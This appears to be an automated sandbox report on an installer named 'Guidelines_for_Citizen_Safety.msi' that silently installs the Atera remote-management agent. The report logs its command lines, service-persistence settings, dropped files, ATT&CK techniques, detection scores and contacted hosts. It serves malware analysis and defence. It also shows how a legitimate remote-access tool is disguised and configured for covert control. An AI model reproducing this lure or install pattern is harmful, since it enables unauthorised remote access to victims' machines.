                              Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2"
                              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                              Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="paul.fraxom@yzistanbul.me" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000kso2piab" /agentid="2094f497-2e94-42f0-b27c-add7e377a9d2"
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
                              Source: C:\Windows\System32\msiexec.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe; Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe; Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

                              Remote Access Functionality

                              Source: Yara match; File source: 13.0.AteraAgent.exe.158ec7a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 19.2.AgentPackageAgentInformation.exe.2ac50640000.1.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 19.0.AgentPackageAgentInformation.exe.2ac4fe20000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 7832, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 7892, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 8000, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: AteraAgent.exe PID: 7400, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: AteraAgent.exe PID: 6216, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 4308, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 5852, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7332, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: AgentPackageAgentInformation.exe PID: 6992, type: MEMORYSTR
                              Source: Yara match; File source: C:\Windows\Temp\~DFE1D8FD4611557514.TMP, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Temp\~DFD5E723F7AA2005AD.TMP, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Temp\~DFB8E4C2B6BEE736E9.TMP, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Temp\~DF9340E6CB357EA061.TMP, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Temp\~DFC5872F544B03548F.TMP, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                              Source: Yara match; File source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Temp\~DF975FD2E2CDD5436E.TMP, type: DROPPED
                              Source: Yara match; File source: C:\Config.Msi\6c6862.rbs, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Installer\MSI8A82.tmp, type: DROPPED
MITRE ATT&CK matrix
Tactics: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Techniques: Replication Through Removable Media; Windows Management Instrumentation; DLL Side-Loading; Disable or Modify Tools; Peripheral Device Discovery; Archive Collected Data; Ingress Tool Transfer; Command and Scripting Interpreter; Windows Service; Obfuscated Files or Information; File and Directory Discovery; Encrypted Channel; Service Execution; Process Injection; Timestomp; System Information Discovery; Non-Application Layer Protocol; Query Registry; Application Layer Protocol; File Deletion; Security Software Discovery; Masquerading; Process Discovery; Modify Registry; Virtualization/Sandbox Evasion; Application Window Discovery; Rundll32
Behavior Graph ID: 1561804 | Sample: Guidelines_for_Citizen_Safety.msi | Startdate: 24/11/2024 | Architecture: WINDOWS | Score: 88

Source | Detection | Scanner | Label | Link
Guidelines_for_Citizen_Safety.msi | 29% | ReversingLabs | Win32.Trojan.Atera |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | 26% | ReversingLabs | Win32.Trojan.Atera |
C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI6A36.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI6A36.tmp-\System.Management.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI7013.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI7013.tmp-\System.Management.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI87B3.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI87B3.tmp-\System.Management.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI8A93.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI8B30.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI8C79.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIA9F5.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dll | 0% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://agent-api.aterDZ | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ps.pndsn.com | 13.232.67.198 | true | false | | high
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
d25btwd9wax8gu.cloudfront.net | 108.158.75.93 | true | false | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
windowsupdatebg.s.llnwi.net | 178.79.238.0 | true | false | | high
ps.atera.com | unknown | unknown | false | | high
agent-api.atera.com | unknown | unknown | false | | high
time.windows.com | unknown | unknown | false | | high
                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                              https://ps.atera.com/agentpackagesmac/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zipAteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://agent-api.atera.com/Production/Agent/GetRecurringPackagesckNTIALBACKOFF02ceca8-a958-11e5-bd8AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.datacontract.orgAteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://agent-api.atera.com/Production/Agent/GetCommands)AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://agent-api.atera.com/Production/Agent/track-eventrundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://dl.google.com/googletalk/googletalk-setup.exeAgentPackageAgentInformation.exe, 00000013.00000000.1743436849.000002AC4FE22000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.15.drfalse
                                                                                                            high
                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageADRemote/6.0/AgentPackageADRemote.zipAteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageA0HAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://www.newtonsoft.com/jsonrundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://agent-api.atera.com/Production/Agent/AgeAteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://wixtoolset.org/news/rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, Microsoft.Deployment.WindowsInstaller.dll.18.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbfSystem.ValueTuple.dll.2.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ceAteraAgent.exe, 0000000F.00000002.2638383365.0000018897C55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformationAteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/20.9/AgentPackageOsUpdates.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://agent-api.aterDrundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscoveryAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9d2bb483-a1d5-41c5-b567-c3f48ab6ed2cAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://agent-api.atera.com/Production/Agent/AcknowledgeCommandsAteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/38.0/AgentPackageAgentInformationAteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://agent-api.PAteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  http://www.w3.oAteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAAteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
108.158.75.93 | d25btwd9wax8gu.cloudfront.net | United States | 16509 | AMAZON-02US | false
13.232.67.198 | ps.pndsn.com | United States | 16509 | AMAZON-02US | false
                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                      Analysis ID:1561804
